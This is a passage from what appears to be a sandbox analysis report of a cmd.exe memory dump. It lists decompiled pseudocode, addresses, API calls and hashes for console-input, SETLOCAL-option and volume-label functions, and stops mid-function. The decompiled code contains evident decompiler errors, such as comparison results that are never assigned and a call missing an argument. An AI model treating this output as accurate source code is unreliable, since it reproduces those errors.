                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                    • API String ID: 2081463915-3874590324
                                    • Opcode ID: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction ID: 8eb187385da68ff4cc7cd007489d28d1ed612b1a834babaa0ba62ce91a1e800a
                                    • Opcode Fuzzy Hash: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction Fuzzy Hash: A131AF247807128BEF3E6BF9B81D36A26D09F04749F48802AF642952C5DFA091C6C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F474C, Relevance: 18.2, APIs: 12, Instructions: 203COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E011F474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E011DDF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E011E2430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E011E2430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E011E2430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E011E2430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E011DC108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E011F3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E011E711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x11fd5fc == 2) {
											_t63 = E011F46A5(_t89, 0);
											L35:
											 *0x120b8b0 = _t63;
											return _t63;
										}
										_t63 = E011F46A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E011E3A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E011E6FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E011DC5A2(_t82);
						goto L3;
					}
				}
			}






































                                    0x011f474c
                                    0x011f4757
                                    0x011f475e
                                    0x011f4761
                                    0x011f4762
                                    0x011f4765
                                    0x011f4766
                                    0x011f476c
                                    0x011f4772
                                    0x011f4779
                                    0x011f4799
                                    0x011f479b
                                    0x00000000
                                    0x011f477b
                                    0x011f477b
                                    0x011f4782
                                    0x011f4784
                                    0x011f478a
                                    0x011f47af
                                    0x011f47b3
                                    0x011f47b5
                                    0x011f47bd
                                    0x011f47c1
                                    0x011f47cb
                                    0x011f47cf
                                    0x011f47cf
                                    0x011f47cb
                                    0x011f47d4
                                    0x011f47d7
                                    0x011f47de
                                    0x011f47e1
                                    0x00000000
                                    0x011f47e3
                                    0x011f47e5
                                    0x011f47e8
                                    0x011f47e8
                                    0x011f47f0
                                    0x011f47f4
                                    0x011f47f8
                                    0x011f47fa
                                    0x011f47fd
                                    0x011f4804
                                    0x011f4806
                                    0x011f4809
                                    0x011f4810
                                    0x011f4813
                                    0x011f4815
                                    0x011f4817
                                    0x011f4817
                                    0x011f4813
                                    0x011f481c
                                    0x011f4820
                                    0x00000000
                                    0x011f4826
                                    0x011f482e
                                    0x011f4840
                                    0x011f484b
                                    0x011f4854
                                    0x011f4854
                                    0x011f485c
                                    0x011f4862
                                    0x011f4868
                                    0x011f4878
                                    0x011f4880
                                    0x011f4883
                                    0x011f4891
                                    0x011f4891
                                    0x011f489f
                                    0x011f48a9
                                    0x011f48be
                                    0x011f48c4
                                    0x011f48ca
                                    0x011f48d3
                                    0x011f48fc
                                    0x011f48fc
                                    0x011f48fe
                                    0x011f48d5
                                    0x011f48d5
                                    0x011f48dd
                                    0x00000000
                                    0x011f48df
                                    0x011f48df
                                    0x011f48e6
                                    0x011f48ec
                                    0x011f48ed
                                    0x011f48f0
                                    0x011f48f8
                                    0x00000000
                                    0x00000000
                                    0x011f48fa
                                    0x00000000
                                    0x011f48f8
                                    0x011f48e6
                                    0x011f48dd
                                    0x011f4904
                                    0x011f490b
                                    0x011f4914
                                    0x011f491a
                                    0x011f491a
                                    0x011f4927
                                    0x011f4935
                                    0x011f493b
                                    0x011f493b
                                    0x011f4943
                                    0x00000000
                                    0x011f4949
                                    0x011f4949
                                    0x011f4950
                                    0x011f496e
                                    0x011f4973
                                    0x011f4974
                                    0x011f4975
                                    0x011f4976
                                    0x011f4977
                                    0x011f4978
                                    0x011f4979
                                    0x011f497a
                                    0x011f497b
                                    0x011f497c
                                    0x011f497d
                                    0x011f497e
                                    0x011f497f
                                    0x011f4982
                                    0x011f4985
                                    0x011f4991
                                    0x011f499e
                                    0x011f49a3
                                    0x011f49a3
                                    0x00000000
                                    0x011f49a3
                                    0x011f4993
                                    0x011f499a
                                    0x00000000
                                    0x011f499c
                                    0x011f49a9
                                    0x011f4952
                                    0x011f4954
                                    0x011f495a
                                    0x011f4964
                                    0x011f479c
                                    0x011f479f
                                    0x011f47a0
                                    0x011f47a3
                                    0x011f47ac
                                    0x011f47ac
                                    0x011f4950
                                    0x011f4943
                                    0x011f4820
                                    0x011f478c
                                    0x011f478c
                                    0x011f478c
                                    0x011f478d
                                    0x011f4792
                                    0x00000000
                                    0x011f4798
                                    0x011f478a

                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • wcsrchr.MSVCRT ref: 011F47C1
                                    • wcschr.MSVCRT ref: 011F47D7
                                    • wcsrchr.MSVCRT ref: 011F4809
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F4828
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4838
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4854
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F485C
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4870
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4891
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 011F48BE
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4914
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4935
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                    • String ID:
                                    • API String ID: 4166807220-0
                                    • Opcode ID: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction ID: cf5ea08ca5dbc6c56bd1edcd91df0f1f0d025a92a1e8be328efb88a7cff37b97
                                    • Opcode Fuzzy Hash: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction Fuzzy Hash: F351D7316002199AEF39EB78EC18BBA77F8FF14314F0485ADE645C2580EF708985CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 20%
                                    			E011DC430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0x1213cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E011DC5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0x1213cb8;
						if(_t50 == 0) {
							_t50 = 0x1213ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0x1213cb8;
								if( *0x1213cb8 == 0) {
									_t31 = 0x1213ab0;
								}
								E011E1040(_t53, _t73, _t31);
								_t33 = E011E3B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0x1213cc4;
									 *((char*)(_t77 + 8)) =  *0x1213cc9;
									 *((char*)(_t77 + 9)) =  *0x1213cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0x1213cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0x120b8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0x1213cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
														} else {
															_push(0);
															_push(0x400023a6);
															E011DC5A2(_t65);
															_t22 = 1;
															 *0x120b8b0 = 1;
														}
													} else {
														 *0x1213cc8 = _t40;
														goto L15;
													}
												} else {
													 *0x1213cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0x1213cc9 = 1;
											L15:
											_t78 = E011DD7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}





















                                    0x011dc433
                                    0x011dc435
                                    0x011dc436
                                    0x011dc441
                                    0x011dc447
                                    0x011dc450
                                    0x011dc58c
                                    0x011dc58c
                                    0x011dc456
                                    0x011dc45a
                                    0x011ea90c
                                    0x011ea90e
                                    0x011ea913
                                    0x00000000
                                    0x011dc460
                                    0x011dc460
                                    0x011dc468
                                    0x011ea902
                                    0x011ea902
                                    0x011dc46e
                                    0x011dc473
                                    0x011dc473
                                    0x011dc476
                                    0x011dc479
                                    0x011dc486
                                    0x011dc496
                                    0x011dc49a
                                    0x011ea91a
                                    0x011ea91c
                                    0x011dc4a0
                                    0x011dc4b3
                                    0x011dc4b5
                                    0x011dc4b9
                                    0x00000000
                                    0x011dc4bf
                                    0x011dc4bf
                                    0x011dc4c6
                                    0x011ea922
                                    0x011ea922
                                    0x011dc4cf
                                    0x011dc4d4
                                    0x011dc4d9
                                    0x011dc4de
                                    0x00000000
                                    0x011dc4e4
                                    0x011dc4e4
                                    0x011dc4ef
                                    0x011dc4f7
                                    0x011dc4fd
                                    0x011dc504
                                    0x011dc509
                                    0x011dc50c
                                    0x011dc512
                                    0x011dc514
                                    0x011dc514
                                    0x011dc527
                                    0x011dc529
                                    0x011dc52b
                                    0x011dc56c
                                    0x011dc577
                                    0x011dc581
                                    0x011dc538
                                    0x011dc542
                                    0x011dc59b
                                    0x00000000
                                    0x011dc544
                                    0x011dc54a
                                    0x011dc554
                                    0x011ea932
                                    0x011ea939
                                    0x011ea93c
                                    0x011ea94d
                                    0x00000000
                                    0x011ea953
                                    0x011ea953
                                    0x011ea954
                                    0x011ea959
                                    0x011ea961
                                    0x011ea963
                                    0x011ea963
                                    0x011ea93e
                                    0x011ea93e
                                    0x00000000
                                    0x011ea93e
                                    0x011dc55a
                                    0x011dc55a
                                    0x00000000
                                    0x011dc55a
                                    0x011dc554
                                    0x011dc583
                                    0x011dc583
                                    0x011dc561
                                    0x011dc568
                                    0x011dc56a
                                    0x00000000
                                    0x011dc56a
                                    0x00000000
                                    0x011dc581
                                    0x00000000
                                    0x011dc56c
                                    0x011dc4de
                                    0x011dc4b9
                                    0x011dc49a
                                    0x011dc45a
                                    0x011dc58e
                                    0x011dc596

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 011DC489
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC490
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 011DC4A6
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC4AD
                                    • _wcsicmp.MSVCRT ref: 011DC538
                                    • _wcsicmp.MSVCRT ref: 011DC54A
                                    • _wcsicmp.MSVCRT ref: 011DC577
                                    • _wcsicmp.MSVCRT ref: 011EA932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap_wcsicmp$AllocProcess
                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                    • API String ID: 435930816-3086019870
                                    • Opcode ID: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction ID: d6c9d0c1d99095b623c986b5dd1170a49416d7388a99cee5ea1ecac3c27d52b1
                                    • Opcode Fuzzy Hash: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction Fuzzy Hash: 405138353046029FEB2DDF79B808A773BE5FF18624715486EE842C7286EF21D841CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FA834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E011FA834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E011E0C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E011DC5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E011E0C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E011E0C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E011E0D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E011E4C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E011E0CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E011E274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E011F7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E011DC5A2(_t133);
						goto L48;
					}
				}
			}









































                                    0x011fa834
                                    0x011fa83f
                                    0x011fa846
                                    0x011fa851
                                    0x011fa858
                                    0x011fa85a
                                    0x011fa862
                                    0x011fa86e
                                    0x011fa871
                                    0x011fa873
                                    0x011fa879
                                    0x011fa881
                                    0x011fa88c
                                    0x011fa892
                                    0x011fa8a1
                                    0x011fa8a9
                                    0x011fa8b4
                                    0x011fa8ba
                                    0x011fa8c9
                                    0x011fa8d0
                                    0x011fa8f5
                                    0x011fab2f
                                    0x011fab2f
                                    0x011fab30
                                    0x011fab32
                                    0x011fab39
                                    0x011fab3b
                                    0x011fab3b
                                    0x011fab3d
                                    0x011fab3d
                                    0x011fab3f
                                    0x011fab45
                                    0x011fab52
                                    0x011fab5f
                                    0x011fab78
                                    0x011fab78
                                    0x011fa8fd
                                    0x011fa91f
                                    0x00000000
                                    0x00000000
                                    0x011fa927
                                    0x011fa949
                                    0x00000000
                                    0x00000000
                                    0x011fa956
                                    0x011fa95b
                                    0x011fa961
                                    0x011fa965
                                    0x011fa967
                                    0x011fa967
                                    0x011fa96d
                                    0x011fa970
                                    0x011fa970
                                    0x011fa973
                                    0x011fa976
                                    0x011fa97b
                                    0x011fa983
                                    0x011fa987
                                    0x011fa989
                                    0x011fa989
                                    0x011fa991
                                    0x011fa993
                                    0x011fa993
                                    0x011fa99f
                                    0x011fa9a8
                                    0x00000000
                                    0x011fa9ae
                                    0x011fa9b9
                                    0x011fa9be
                                    0x011fa9c6
                                    0x011fa9c8
                                    0x011fa9c8
                                    0x011fa9ce
                                    0x011fa9d6
                                    0x011fa9d8
                                    0x011fa9d8
                                    0x011fa9e2
                                    0x011fa9f9
                                    0x011faa20
                                    0x011faa26
                                    0x011faa2a
                                    0x011faa2c
                                    0x011faa2c
                                    0x011faa36
                                    0x011faa59
                                    0x011faa5b
                                    0x011faa5b
                                    0x011faa63
                                    0x00000000
                                    0x011faa38
                                    0x011faa3a
                                    0x011faa3c
                                    0x011faa3c
                                    0x011faa42
                                    0x011faa4b
                                    0x011faa46
                                    0x011faa48
                                    0x011faa48
                                    0x011faa52
                                    0x011faa67
                                    0x011faa67
                                    0x011faa6d
                                    0x011faa71
                                    0x011faa73
                                    0x011faa73
                                    0x011faa7c
                                    0x011faab2
                                    0x011faaba
                                    0x011faabc
                                    0x011faabc
                                    0x011faac2
                                    0x011faad0
                                    0x011faa7e
                                    0x011faa80
                                    0x011faa82
                                    0x011faa82
                                    0x011faa88
                                    0x011faa90
                                    0x011faa92
                                    0x011faa92
                                    0x011faa98
                                    0x011faa9e
                                    0x011faaa8
                                    0x011faaad
                                    0x011faad8
                                    0x011faadc
                                    0x011faade
                                    0x011faae6
                                    0x011faaf3
                                    0x011fab0d
                                    0x011fab2b
                                    0x011fab2b
                                    0x011faae6
                                    0x00000000
                                    0x011faadc
                                    0x011fa9fb
                                    0x011faa06
                                    0x00000000
                                    0x00000000
                                    0x011faa0c
                                    0x011faa13
                                    0x011faa14
                                    0x00000000
                                    0x011faa1a
                                    0x011fa9f9

                                    APIs
                                    • memset.MSVCRT ref: 011FA879
                                    • memset.MSVCRT ref: 011FA8A1
                                    • memset.MSVCRT ref: 011FA8C9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011FA9F1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 011FA9FB
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 011FAA0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB45
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB52
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$ErrorLast$InformationVolume
                                    • String ID: %04X-%04X
                                    • API String ID: 2748242238-1126166780
                                    • Opcode ID: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction ID: 94e9f4bf92a855db9f811c40c5fd1942edafa6ba79c4867ada87fcda2a5e8930
                                    • Opcode Fuzzy Hash: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction Fuzzy Hash: 6291C4B1A012295BDF29DA64DC44AEA77B9EF54258F4404EDE60DE3141EB349F88CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 66%
                                    			E011E3121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
